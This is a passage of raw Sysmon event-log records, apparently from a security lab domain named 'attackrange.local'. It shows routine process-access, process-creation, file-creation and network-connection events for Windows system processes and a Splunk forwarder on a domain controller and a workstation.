319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-290F-00000000BB01}6312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.028{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-290F-00000000BB01}6312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.028{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-290F-00000000BB01}6312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-280F-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050621Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC2E-607E-F006-00000000BB01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050620Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050619Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050618Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050617Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050616Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050615Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050614Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050613Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050612Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050611Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EC2E-607E-F006-00000000BB01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050610Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.783{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC2E-607E-F006-00000000BB01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050609Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.784{85C0FFC9-EC2E-607E-F006-00000000BB01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050608Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.518{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=920FE9BC90405E3BE02BAC8E7CD079E1,SHA256=160865A1E24DE95D7C278CE3D10CD55D759DB708498AC3780879D06D7CDABFA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050607Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.377{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A62AB6F554E0A18E3DB9C0D8C7E0FB22,SHA256=4181D56F78AF2B4A044D0CD2F4FD9B18ACBA9814DEBE6D87B8B2F72961C6A24A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050606Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:52.306{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56991-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000081239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-430F-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.981{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-430F-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.981{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-430F-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.950{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-420F-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.934{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-420F-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.934{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-420F-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.719{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57610-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000081232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 